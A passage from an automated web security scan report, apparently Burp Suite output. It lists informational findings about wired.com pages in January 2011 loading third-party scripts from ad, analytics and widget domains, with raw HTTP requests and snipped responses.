<p><script src="http://mediaplayer.yahoo.com/js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.34. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=447
Expires: Wed, 12 Jan 2011 15:47:21 GMT
Date: Wed, 12 Jan 2011 15:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.35. http://www.wired.com/inspiredbyyou/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /inspiredbyyou/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:38:23 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=466
Expires: Wed, 12 Jan 2011 15:46:09 GMT
Date: Wed, 12 Jan 2011 15:38:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 99556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.36. http://www.wired.com/js/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /js/global.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /js/global.js HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:12:44 GMT
Date: Wed, 12 Jan 2011 05:02:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37327

//mobify include
var _mm = "http://m.wired.com/";

(function() {
if(document.domain.indexOf("howto.wired.com")>=0) {
return;
}
if(document.domain.indexOf("wired.com")>=0) {

...[SNIP]...
)
document.addEventListener("DOMContentLoaded", init, false);

// for Internet Explorer
/*@cc_on @*/
/*@if (@_win32)
document.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

6.37. http://www.wired.com/magazine/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /magazine/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /magazine/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/magazine/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 11:23:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:39:00 GMT
Date: Wed, 12 Jan 2011 15:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- Magazine Xrail Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.38. http://www.wired.com/magazine/decode/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /magazine/decode/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /magazine/decode/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:04:48 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:46:19 GMT
Date: Wed, 12 Jan 2011 15:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.39. http://www.wired.com/magazine/ipad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /magazine/ipad

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /magazine/ipad HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:04 GMT
Date: Wed, 12 Jan 2011 15:39:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- start brightcove - wired.com homepage xrail -->
           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- start brightcove - wired.com homepage xrail -->
           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- start brightcove - wired.com homepage xrail -->
           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- start brightcove - wired.com homepage xrail -->
           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://www.reddit.com/static/button/button1.js"></script>
...[SNIP]...
<div id="sb_art_yahoo" class="social">
<script showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">wired:http://www.wired.com/magazine/ipad/</script>
...[SNIP]...
<!-- Magazine Xrail Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.40. http://www.wired.com/medtech/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /medtech/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /medtech/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=245
Expires: Wed, 12 Jan 2011 15:40:34 GMT
Date: Wed, 12 Jan 2011 15:36:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69903


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- Underwire Xrail Brightcove Player zindex fixed --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.41. http://www.wired.com/nolayout/rssproxy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /nolayout/rssproxy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nolayout/rssproxy HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<!-- close shell div -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

6.42. http://www.wired.com/playbook/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /playbook/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /playbook/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:03:45 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=394
Expires: Wed, 12 Jan 2011 15:46:29 GMT
Date: Wed, 12 Jan 2011 15:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<!-- CES 2011 Widescreen Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.43. http://www.wired.com/politics/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /politics/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /politics/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:46:48 GMT
Date: Wed, 12 Jan 2011 15:36:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70029


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- Underwire Xrail Brightcove Player zindex fixed --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.44. http://www.wired.com/rawfile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /rawfile/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rawfile/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:56 GMT
Date: Wed, 12 Jan 2011 15:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<!-- TYPEKIT -->
<script type="text/javascript" src="http://use.typekit.com/ztc8lol.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.45. http://www.wired.com/reviews/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:03:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:44:31 GMT
Date: Wed, 12 Jan 2011 15:36:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+19ed60229e60f2971e8df377934793461f80e3b1+1294844616"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.46. http://www.wired.com/reviews/%20  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/%20

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/%20 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:28:22 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=445
Expires: Wed, 12 Jan 2011 15:44:14 GMT
Date: Wed, 12 Jan 2011 15:36:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+341c71a9e6631583321c56a6363e335fa32b96af+1294846100"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.47. http://www.wired.com/reviews/category/automotive/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/automotive/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/automotive/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:33:51 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=477
Expires: Wed, 12 Jan 2011 15:44:49 GMT
Date: Wed, 12 Jan 2011 15:36:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+996f2ee0e424f8826829883c1c48da62f4667b81+1294846431"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.48. http://www.wired.com/reviews/category/desktops-and-accessories/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /reviews/category/desktops-and-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/category/desktops-and-accessories/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:50 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=453
Expires: Wed, 12 Jan 2011 15:44:28 GMT
Date: Wed, 12 Jan 2011 15:36:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61151

